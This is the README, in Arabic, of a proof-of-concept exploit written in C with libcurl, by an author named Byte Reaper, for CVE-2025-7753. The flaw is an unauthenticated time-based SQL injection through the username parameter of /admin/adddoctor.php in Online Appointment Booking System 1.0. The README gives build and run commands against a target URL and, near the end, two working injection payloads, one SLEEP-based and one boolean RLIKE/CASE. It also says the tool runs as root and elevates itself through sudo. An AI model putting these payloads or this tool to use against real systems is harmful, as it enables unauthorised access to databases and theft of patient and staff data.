
استغلال PoC لـ CVE-2025-7753 — Time-Based SQL Injection في نظام Online Appointment Booking System 1.0 عبر معلمة username. تم كتابة الاستغلال بلغة C باستخدام libcurl.
المؤلف: Byte Reaper
تيليغرام: @ByteReaper0
CVE: CVE‑2025‑7753
الثغرة: SQL Injection غير مصادق عليها، قائمة على الوقت
توجد ثغرة SQL Injection خطيرة في Online Appointment Booking System 1.0 (Code‑Projects) في الملف
/admin/adddoctor.php. معامل username لا يتم تعقيمه بشكل صحيح، مما يسمح للمهاجمين عن بعد بتنفيذ استعلامات SQL عشوائية (قائمة على الوقت، قائمة على الأخطاء، اتحاد، منطقية).
يوفر هذا المستودع أول PoC عام مكتوب بلغة C، مستخدمًا libcurl لطلبات HTTP وإخراج ملون ANSI للوضوح.
نظام التشغيل: Linux (x86_64 موصى به)
المترجم: GCC أو Clang
التبعيات:
sudo apt update sudo apt install build-essential libcurl4-openssl-dev
🚀 البناء والتشغيل
التجميع:
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
التنفيذ (كجذر):
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
الوضع المفصل (اختياري):
sudo ./CODE_PROJECT -u http://TARGET/... -v
📜 سير عمل الاستغلال
تتحقق فحوصات البيئة من أنك على Linux وتعمل كجذر (تتصعيد تلقائي عبر sudo إذا لزم الأمر).
تتضمن مجموعة الحمولة:
يقوم libcurl بإجراء طلبات POST والتقاط ردود الخادم.
يقوم تحليل الاستجابة بمسح سلاسل أخطاء SQL لتأكيد الثغرة.
🧪 الحمولات المختبرة
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz
11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm
… etc.
MIT